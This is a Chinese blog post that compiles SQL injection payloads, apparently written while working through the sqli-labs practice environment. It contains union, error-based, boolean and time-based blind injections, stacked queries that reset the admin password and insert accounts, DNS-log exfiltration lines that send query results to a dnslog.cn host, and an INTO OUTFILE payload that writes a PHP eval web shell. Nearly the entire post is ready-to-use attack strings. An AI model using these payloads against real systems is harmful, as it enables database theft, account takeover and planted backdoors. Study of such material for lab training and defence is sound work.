首页 > 数据库 >sql注入总汇

sql注入总汇

时间:2022-12-12 13:48:56浏览次数:52  
标签:database -- 0x7e 总汇 select sql id concat 注入

网址
?id=10'union select 1,database(),3 -- qwe
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
union select 1,"<?php eval($_REQUEST[8])?>",3 into outfile "D://phpstudy_pro//WWW//sqli-labs-master//Less-7//1.php"-- a
?id=1' and (length(database()))=8 -- qwe
?id=1' and (ascii(substr(database(),1,1)))=115-- qwe
?id=1' and if (length(database())=8,sleep(5),1) -- qwe
修改 1';update security.users set password='123456' where username="admin"#
插入 ?id=-1 ;insert into users(id,username,password)values(100,'213','123123');
抓包 'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or'
' and 1=1 or '1'='1
dns盲注注入 :
and (select load_file(concat('//',(database()),'.DNS/abc'))) #
and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema= 'challenges' ),'.clde5o.dnslog.cn/abc'))) #
and (select load_file(concat('//',(select column_name from information_schema.columns where table_name= 'f5depwb17g' limit 2,1),'.clde5o.dnslog.cn/abc'))) #
and (select load_file(concat('//',(select secret_3Q8Q from f5depwb17g),'.clde5o.dnslog.cn/abc'))) #
网页
admin ' or 1=1 #
admin' or (length(database()))=8 #
admin' or if (length(database())=8,sleep(5),1) #
'or updatexml(1,concat(0x7e,(select database()),0x7e),1) #
'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or'


http://127.0.0.1/sqli-labs-master/Less-54/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'challenges' -- a
http://127.0.0.1/sqli-labs-master/Less-54/?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name= '775r48h6e8' -- a

标签:database,--,0x7e,总汇,select,sql,id,concat,注入
From: https://www.cnblogs.com/sjzdest/p/16975822.html

相关文章

  • sql-lib8-28
    8-22'orupdatexml(1,concat(0x7e,(selectdatabase()),0x7e),1)or''orupdatexml(1,concat(0x7e,(selectgroup_concat(table_name)frominformation_schema.tableswhe......
  • mysql
    mysql基础知识mysql执行过程从上图可以看出,MySQL主要由下面几部分构成:连接器:身份认证和权限相关(登录MySQL的时候)。查询缓存:执行查询语句的时候,会先查询缓存(M......
  • MySQL客户端的进阶操作
    GreatSQL社区原创内容未经授权不得随意使用,转载请联系小编并注明来源。GreatSQL是MySQL的国产分支版本,使用上与MySQL一致。作者:土豆娃娃文章来源:社区投稿引言作为......
  • delphi编写sql脚本文件批量执行程序
    程序使用DelphiXE11.1开发,用到控件UniDac9.1.1,QDAC里面的Qlog组件。程序实现了SQL脚本文件批处理执行应用,运行效果图。  文件.pas代码unitmain;interfaceuses......
  • 阿里云Centos7使用yum安装MySQL5.6的正确姿势
    我们对service和chkconfig两个命令都不陌生,systemctl是管制服务的主要工具,它整合了chkconfig与service功能于一体。systemctlis-enablediptables.servicesystemctlis......
  • wsl下docker的ubuntu20.04环境配置mysql、nginx、编译php、编译swoole
    1、docker的ubuntu镜像不识别命令 apt-getupdate #更新 2、aptinstallvim#安装vim编辑器 !!!!!wsl2不用换源,会导致安装依赖时出现版本不对应的情况!!!!! ......
  • k8s容器内部通过Prometheus Operator部署MySQL Exporter监控k8s集群外部的MySQL
    写在前面在按照下面步骤操作之前,请先确保服务器已经部署k8s,prometheus,prometheusoperator,关于这些环境的部署,可以自行查找相关资料安装部署,本文档便不在此赘述。关于pro......
  • MySQL锁,锁的到底是什么?
    作者:蝉沐风博客站点:​​www.chanmufeng.com​​公众号:蝉沐风的码场MySQL锁系列文章已经鸽了挺久了,最近赶紧挤了挤时间,和大家聊一聊MySQL的锁。只要学计算机,「​​锁​​」永......
  • 当pycharm连接不上mysql时候,如何解决?
    当发现pycharm一直连接不上mysql时候,要考虑几个问题?一、端口是否被占用当我再win10中输入netstat -aon|findstr3306   再去任务管理里面发现,还有有两个mysql......
  • PostgreSQL 9.3发布
    9月9日,PostgreSQL全球开发组宣布了​​9.3版发布​​的消息。从2010年9.0版开始,PostgreSQL已经连续四个版本稳定地按时在每年9月中旬发布,从一个侧面也显示了开发团队的强大......